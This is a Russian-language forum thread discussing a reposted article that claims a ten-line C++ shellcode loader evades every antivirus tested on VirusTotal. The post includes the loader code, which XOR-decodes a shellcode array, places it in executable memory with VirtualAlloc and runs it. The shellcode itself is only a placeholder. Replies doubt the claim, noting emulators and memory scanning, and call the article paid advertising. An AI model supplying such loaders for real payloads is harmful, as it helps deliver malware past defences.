ВАЖНО Не большой и не маленький обход сигнатуры любого антивируса при помощи десяти строк на Си

[X-Shar]

Специалист по информационной безопасности под ником

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

опубликовал на прошлой неделе запись в своем блоге, в которой рассказывается о том, как можно обойти любой антивирус при помощи десяти строк кода.

Изначально Evasiv3 планировал написать огромный пост о способах обхода антивирусной защиты, однако, протестировав первый шаг своего «руководства» он был очень удивлен: ни один из 56 протестированных продуктов, призванных обеспечить безопасность пользователя в сети, не обнаружил его бинарник.

После получения подобного результата я решил отказаться от своей идеи долгого и изматывающего обхода антивирусной защиты и действовать быстро, «грязно», но при этом невероятно просто.

В своей работе evasiv3 использовал

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

, часть

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

. Автор отмечает его как «превосходный инструмент, который почти никогда его не подводил».

Код, представленный ниже, написан на С++ и ориентирован на атаку, в первую очередь, windows-платформы:

Скопировать в буфер обмена

#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {
char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
((void(*)())exec)();
}

Приведенный выше код создает массив символов с шелл-кодом, выполняет операцию XOR с невероятно сложным ключом «х» в нижнем регистре, выделяет немного памяти, копирует массив в нее и после выполняет.

Если вы сейчас подумали «да ладно!», то у вас та же реакция, что и у Evasiv'a. Масла в огонь подливает тот факт, что бинарник был обнаружен 0 антивирусов из 56 после проверки через VirusTotal. Продемонстрированный выше АВ-обход показывает, что простейший и основной метод проникновения до сих пор является рабочим.

Конечно, большинство антивирусов сосредоточены на пресечении эксплуатации уязвимостей, а не на них выявление, так что «хоронить» их пока рано.

На скриншоте в начале статьи указана дата за 2015 год, однако, автор кода перепроверил бинарник VirusTotal перед

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

. Результат тот же: 0 из 56.

Источник:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Мой комментарий: Возможно что АВ спалят в памяти, но всё-равно не плохо...

 

[Indy]

Ну вот и с чего должен быть детект, надо было сигнатуру заюзать. Уже школота статьи писать желает, не ясно только для кого.

 

[X-Shar]

Уже школота статьи писать желает, не ясно только для кого.

Ты всё правильно понял, это рекламная статья гамно-хостинга ua-hosting.company (Информация - Повесть о том как нельзя выбирать хостинг, или вся правда про ua-hosting.company), у них есть блог на Хабре, вот они для рекламы и пишут статьи, в основном рекламного содержания конечно, НО по правилам Хабра нужно ещё что-то писать, вот они и пытаются лесть в ИБ, статья скорей-всего заказная...

Про автора самого блога незнаю, может-быть и хороший спец., пока там всего одна статья, вот он этот блог:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

А если интересуют вирусы, именно как технологии, вот интересные на мой взгляд статьи на Хабре, старые правда:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Там и комменты можно почитать, писал бывший разработчик одного антивирусного движка...

 

[Indy]

X-Shar

Листанул ссылки, это какой то не правильный авер:

Пермутация — это перестановка блоков кода в каждом новом поколении.

То что он понимает под пермутацией носит название и смысл морфинга. Метаморфизм и пермутация совсем другое. Первое это генерация кода из уже имеющегося, в частном случае используя компиляцию. Пермутация это рекомпиляция исходного тела, выделение ядра от треша и его рекомпиляция. Как то так.

 

[ason]

Ну вот и с чего должен быть детект, надо было сигнатуру заюзать. Уже школота статьи писать желает, не ясно только для кого.

Если я правильно понял,то это всего лишь инструмент который по идее должен помочь запустить само тело вируса(сам инструмент и не должен детектиться ).
На хабре 42 комментария и ни одного ответа от человека который бы запустил этот транспортник вместе с телом вируса (даже на виртуалке),после чего можно
и говорить о детекте.
Не знаю,может и ошибаюсь.

 

[Indy]

ason

Для любого эмулятора это то же самое, что и напрямую вызвать буфер. Поэтому вообще не ясно о чём он там болтает. Как я понял он думает что имеет значение сложность ключа, не зная про эмулятор ничего.

 

[ason]

Поэтому вообще не ясно о чём он там болтает.

Зато я "прослезился"читая в коментах как тяжело живется пожилым ITишникам и как глупа молодежь.
Не знаю почему меня это зацепило но я уверен что любой адекватный специалист начнет изучение предмета с
"корневых каталогов" причина-следствие.Это закон.И связь поколений здесь вообще не причем.
P.S. Извиняюсь за оффтоп.

 

[X-Shar]

Поэтому вообще не ясно о чём он там болтает.

Как понял смысл в том-что сигнатурный детект можно этим обойти, т.е. если обработать так вирус и залить на VT не будет детекта, сомнительно конечно, НО при запуске большинство АВ будут детектить...

Так-то надо-было действительно сигнатуру забить и посмотреть, я делал как-то похожее что-то, почти все АВ детектили в памяти, либо эмулятором ловили такое...

 

[Indy]

X-Shar

Это же просто копирование в буфер, что же этим обойти то можно :)

Там есчо некие фреймворки юзались и что в конце тестилось не известно. Аналогично можно заявить что всё обходится циклом for, так как после тестов детекта небыло.

 

[rain.hf]

мне кажется что Специалист по информационной безопасности под ником

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

слишком громко сказано